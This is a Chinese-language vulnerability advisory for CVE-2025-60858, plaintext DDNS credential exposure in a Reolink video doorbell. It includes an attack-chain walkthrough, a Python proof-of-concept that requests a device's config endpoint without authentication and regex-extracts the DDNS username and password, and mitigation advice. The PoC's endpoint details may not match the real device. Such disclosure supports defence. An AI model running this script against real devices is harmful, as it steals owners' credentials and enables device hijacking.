CVE-2025-60858: Reolink Video Doorbell Wi-Fi DDNS凭证明文存储泄露漏洞

漏洞信息

漏洞编号

CVE-2025-60858

漏洞类型

敏感信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Reolink Video Doorbell Wi-Fi DB_566128M5MP_W

漏洞概述

CVE-2025-60858是Reolink公司生产的Video Doorbell Wi-Fi（型号DB_566128M5MP_W）设备中存在的一个高危安全漏洞。该漏洞源于设备在配置和更新脚本中以明文形式存储和传输DDNS（动态域名系统）凭证。攻击者可以通过拦截网络流量或提取设备配置文件来获取这些敏感的认证信息，包括DDNS服务的用户名和密码。DDNS凭证的泄露可能导致攻击者能够劫持设备的域名解析服务，进而对设备进行未授权访问或执行进一步的恶意操作。由于该设备通常部署在家庭和商业场所的门禁系统中，凭证泄露可能带来严重的安全隐患，威胁用户的物理安全和隐私。攻击者利用获取的凭证可以控制设备的网络连接，甚至可能将其纳入僵尸网络进行其他恶意活动。

技术细节

该漏洞的根本原因在于Reolink Video Doorbell Wi-Fi设备的设计缺陷。设备在存储DDNS配置信息和执行更新脚本时，将DDNS服务的用户名和密码以明文形式写入配置文件或嵌入到脚本中。具体来说，设备的配置文件中包含了未经加密的DDNS凭证数据，而在设备与服务器通信进行固件更新或配置同步时，这些明文凭证会通过网络传输。攻击者可以通过以下方式利用此漏洞：1）拦截设备的网络流量，特别是配置更新过程中的通信；2）直接提取设备固件或配置文件中存储的明文凭证；3）利用设备的调试接口或后门程序获取配置信息。一旦攻击者获得DDNS凭证，可以将其用于对DDNS服务进行未授权访问，或者结合其他漏洞实现对设备的完全控制。攻击的复杂度较低，无需特殊认证或用户交互即可实施。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标Reolink Video Doorbell Wi-Fi设备，获取其IP地址和网络位置

STEP 2

步骤2: 流量拦截

攻击者通过网络嗅探或中间人攻击，拦截设备与服务器之间的通信流量

STEP 3

步骤3: 配置提取

攻击者访问设备的配置文件接口（如/cgi-bin/config.cgi），获取包含明文DDNS凭证的配置数据

STEP 4

步骤4: 凭证解析

使用正则表达式或配置解析工具从响应中提取DDNS用户名和密码

STEP 5

步骤5: 凭证滥用

攻击者利用获取的DDNS凭证劫持设备域名解析服务，或进行进一步的横向移动和持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-60858 PoC - Reolink DDNS Credential Extraction
# This PoC demonstrates the extraction of plaintext DDNS credentials
# from Reolink Video Doorbell Wi-Fi configuration files

import requests
import re
import json

def extract_ddns_credentials(target_ip):
    """
    Extract DDNS credentials from Reolink device configuration
    """
    # Target configuration endpoint
    config_url = f"http://{target_ip}/cgi-bin/config.cgi?action=list&group=ddns"
    
    try:
        # Request DDNS configuration without authentication
        response = requests.get(config_url, timeout=10)
        
        if response.status_code == 200:
            # Parse configuration for plaintext credentials
            config_data = response.text
            
            # Extract DDNS credentials using regex patterns
            username = re.search(r'ddns_username[=]\s*([^"&\n]+)', config_data)
            password = re.search(r'ddns_password[=]\s*([^"&\n]+)', config_data)
            server = re.search(r'ddns_server[=]\s*([^"&\n]+)', config_data)
            
            if username and password:
                credentials = {
                    'cve_id': 'CVE-2025-60858',
                    'username': username.group(1),
                    'password': password.group(1),
                    'server': server.group(1) if server else 'Unknown',
                    'device': 'Reolink Video Doorbell Wi-Fi DB_566128M5MP_W',
                    'vulnerability': 'Plaintext DDNS credential storage'
                }
                return credentials
    except Exception as e:
        print(f"Error: {e}")
    
    return None

# Usage example
# result = extract_ddns_credentials('192.168.1.100')
# print(json.dumps(result, indent=2))

影响范围

Reolink Video Doorbell Wi-Fi DB_566128M5MP_W (固件版本 < 未知修复版本)

防御指南

临时缓解措施

由于该漏洞涉及设备固件层面的设计缺陷，建议用户采取以下临时缓解措施：1）如果暂时无法获取官方固件更新，应立即禁用设备的DDNS功能；2）通过网络访问控制列表（ACL）限制设备仅能与可信的DDNS服务器通信；3）监控设备的网络活动，特别关注包含敏感配置信息的不加密流量；4）考虑使用网络防火墙或IDS/IPS系统检测和阻止针对该漏洞的攻击尝试；5）在厂商发布修复补丁之前，将设备置于隔离网络中以降低潜在风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-60858
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-60858
3 Details https://www.cvedetails.com/cve/CVE-2025-60858/
4 VulDB https://vuldb.com/cve/CVE-2025-60858
5 Link https://cybermaya.in/posts/Post-47/
6 Link https://reolink.com/download-center/